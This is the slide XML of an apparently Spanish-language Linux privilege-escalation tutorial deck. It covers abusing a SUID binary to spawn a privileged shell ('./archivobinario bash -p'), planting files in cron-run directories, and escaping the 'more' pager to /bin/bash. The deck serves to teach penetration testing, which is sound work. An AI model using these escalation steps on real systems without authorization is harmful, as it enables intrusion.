                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
                <a:latin typeface="Bahnschrift" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3300" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
                <a:latin typeface="Bahnschrift" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>rw</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3300" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
                <a:latin typeface="Bahnschrift" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>S</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3300" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
                <a:latin typeface="Bahnschrift" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>r</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3300" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
                <a:latin typeface="Bahnschrift" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>-x--- 1 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3300" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
                <a:latin typeface="Bahnschrift" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>usersudo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3300" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
                <a:latin typeface="Bahnschrift" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> user 14876 Jan 11 19:18 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3300" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
                <a:latin typeface="Bahnschrift" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>archivobinario</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="3300" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="FFFF00"/>
              </a:solidFill>
              <a:latin typeface="Bahnschrift" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="3300" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:latin typeface="Bahnschrift" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="es-ES" sz="3800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Bahnschrift" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Queremos escalar a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="3800" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Bahnschrift" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>usersudo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="3800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Bahnschrift" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> pero somos </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="3800" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Bahnschrift" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>user</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="3800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Bahnschrift" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>, ese archivo al tener </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="3800" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Bahnschrift" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>ssuid</a:t>
            </a:r>
            <a:endParaRPr lang="es-ES" sz="2500" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:latin typeface="Bahnschrift" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="es-ES" sz="3800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Bahnschrift" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>se ejecutará como </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="3800" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Bahnschrift" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>usersudo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="3800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Bahnschrift" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>, a partir de su </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="3800" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Bahnschrift" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>ejecucion</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="3800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Bahnschrift" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> inyectamos </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="3800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Bahnschrift" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>comandos</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="es-ES" sz="3800" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:latin typeface="Bahnschrift" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="es-ES" sz="4200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Bahnschrift" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>-  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="4200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFC000"/>
                </a:solidFill>
                <a:latin typeface="Bahnschrift" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>./</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="4200" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FFC000"/>
                </a:solidFill>
                <a:latin typeface="Bahnschrift" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>archivobinario</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="4200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFC000"/>
                </a:solidFill>
                <a:latin typeface="Bahnschrift" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="4200" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
                <a:latin typeface="Bahnschrift" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>bash</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="4200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
                <a:latin typeface="Bahnschrift" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="4200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
                <a:latin typeface="Bahnschrift" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>–p  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="3800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Bahnschrift" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>(La </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="3800" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Bahnschrift" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>flag</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="3800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Bahnschrift" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> –p fuerza a reconocer el permiso)</a:t>
            </a:r>
            <a:endParaRPr lang="es-ES" sz="3800" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:latin typeface="Bahnschrift" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="es-ES" sz="4200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Bahnschrift" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>o</a:t>
            </a:r>
            <a:endParaRPr lang="es-ES" sz="3800" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:latin typeface="Bahnschrift" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="es-ES" sz="4200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Bahnschrift" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>-  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="4200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFC000"/>
                </a:solidFill>
                <a:latin typeface="Bahnschrift" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>./</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="4200" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FFC000"/>
                </a:solidFill>
                <a:latin typeface="Bahnschrift" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>archivobinario</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="4200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFC000"/>
                </a:solidFill>
                <a:latin typeface="Bahnschrift" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="4200" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
                <a:latin typeface="Bahnschrift" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>ls</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="4200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
                <a:latin typeface="Bahnschrift" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> -la  </a:t>
            </a:r>
            <a:endParaRPr lang="es-ES" sz="3800" dirty="0">
              <a:solidFill>
                <a:srgbClr val="00B050"/>
              </a:solidFill>
              <a:latin typeface="Bahnschrift" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="es-ES" sz="3800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Bahnschrift" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="es-ES" sz="3800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Bahnschrift" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="es-ES" sz="4200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Bahnschrift" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Tener en cuenta probar diferentes terminales en caso de que no se atienda al </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="4200" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Bahnschrift" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>ssuid</a:t>
            </a:r>
            <a:endParaRPr lang="es-ES" sz="3800" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:latin typeface="Bahnschrift" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="es-ES" sz="1600" dirty="0"/>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="es-ES" sz="1600" dirty="0"/>
            </a:br>
            <a:endParaRPr lang="es-ES" sz="1600" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:latin typeface="Bahnschrift" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="es-ES" sz="1800" dirty="0"/>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="es-ES" sz="1800" dirty="0"/>
            </a:br>
            <a:endParaRPr lang="es-ES" sz="1800" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:latin typeface="Bahnschrift" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
              <a:ea typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="127000" indent="0">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="500"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="29FB33"/>
              </a:buClr>
            </a:pPr>
            <a:endParaRPr lang="es-ES" sz="1800" dirty="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
        <p:nvSpPr>
          <p:cNvPr id="106" name="Google Shape;106;p1"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1345223" y="6011129"/>
            <a:ext cx="946736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319807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444870" y="204057"/>
            <a:ext cx="9671050" cy="559342"/>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2800" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FEFEFE"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans"/>
                <a:ea typeface="Lucida Sans"/>
                <a:cs typeface="Lucida Sans"/>
                <a:sym typeface="Lucida Sans"/>
              </a:rPr>
              <a:t>Comprometer tareas cron 1</a:t>
            </a:r>
            <a:endParaRPr sz="28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46872" y="852763"/>
            <a:ext cx="10160000" cy="5891824"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr spcFirstLastPara="1" wrap="square" lIns="91425" tIns="45700" rIns="91425" bIns="45700" anchor="t" anchorCtr="0">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="412750" indent="-285750">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="500"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="29FB33"/>
              </a:buClr>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-ES" sz="1800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>A la hora de comprometer un sistema </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1800" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>linux</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>, una de las cosas que podemos observar son las tareas cron, en el </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1800" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>powerpoint</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t> de administración describimos que son las tareas cron de Linux como funcionan y en que directorio se encuentran.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="127000" indent="0">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="500"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="29FB33"/>
              </a:buClr>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-ES" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>	</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="127000" indent="0">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="500"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="29FB33"/>
              </a:buClr>
            </a:pP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		  ¿Cuál es nuestro objetivo respecto a las tareas cron?</a:t>
            </a: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Atender que hacen esos archivos que son ejecutados por la tarea cron y sus permisos, a su vez si la tarea ejecuta varios ficheros en un directorio, ver que permisos tiene dicho directorio, teniendo en cuenta esto podremos colocar ficheros allí para ser ejecutados por la tarea entre diferentes de maniobras </a:t>
            </a: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Tree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="548234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444870" y="204057"/>
            <a:ext cx="9671050" cy="559342"/>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2800" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FEFEFE"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans"/>
                <a:ea typeface="Lucida Sans"/>
                <a:cs typeface="Lucida Sans"/>
                <a:sym typeface="Lucida Sans"/>
              </a:rPr>
              <a:t>Contexto </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="2800" b="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FEFEFE"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans"/>
                <a:ea typeface="Lucida Sans"/>
                <a:cs typeface="Lucida Sans"/>
                <a:sym typeface="Lucida Sans"/>
              </a:rPr>
              <a:t>del comando More</a:t>
            </a:r>
            <a:endParaRPr sz="28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46872" y="852763"/>
            <a:ext cx="10160000" cy="5891824"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr spcFirstLastPara="1" wrap="square" lIns="91425" tIns="45700" rIns="91425" bIns="45700" anchor="t" anchorCtr="0">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="412750" indent="-285750">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="500"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="29FB33"/>
              </a:buClr>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-ES" sz="1800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>El comando more al igual que </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1800" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>less</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t> hace que un texto se vea de a partes si es muy largo, esto quizás no sea muy útil pero es necesario saber que existe ya que tiene un modo que puede comprometerse y es el modo inserción:</a:t>
            </a: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	</a:t>
            </a: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    Cuando en una salida por consola veamos more y nos da la opción de bajar sobre el texto,      podemos apretar la letra </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="00B0F0"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>v</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>, para entrar en modo inserción, luego </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1800" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="00B0F0"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>esc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="00B0F0"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>y luego </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="00B0F0"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>:</a:t>
            </a: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Esto nos permitirá crear variables de entorno y ejecutarlas</a:t>
            </a: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después de los dos puntos : escribimos set </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1800" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="00B0F0"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>nombrevariable</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>=/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1800" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>bin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1800" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>bash</a:t>
            </a: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Luego escribimos el nombre de la variable y habremos entrado a una </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1800" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>shell</a:t>
            </a:r>
            <a:endParaRPr lang="es-ES" sz="1800" dirty="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
        <p:nvSpPr>
          <p:cNvPr id="106" name="Google Shape;106;p1"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1345223" y="6011129"/>
            <a:ext cx="946736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2138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444870" y="204057"/>
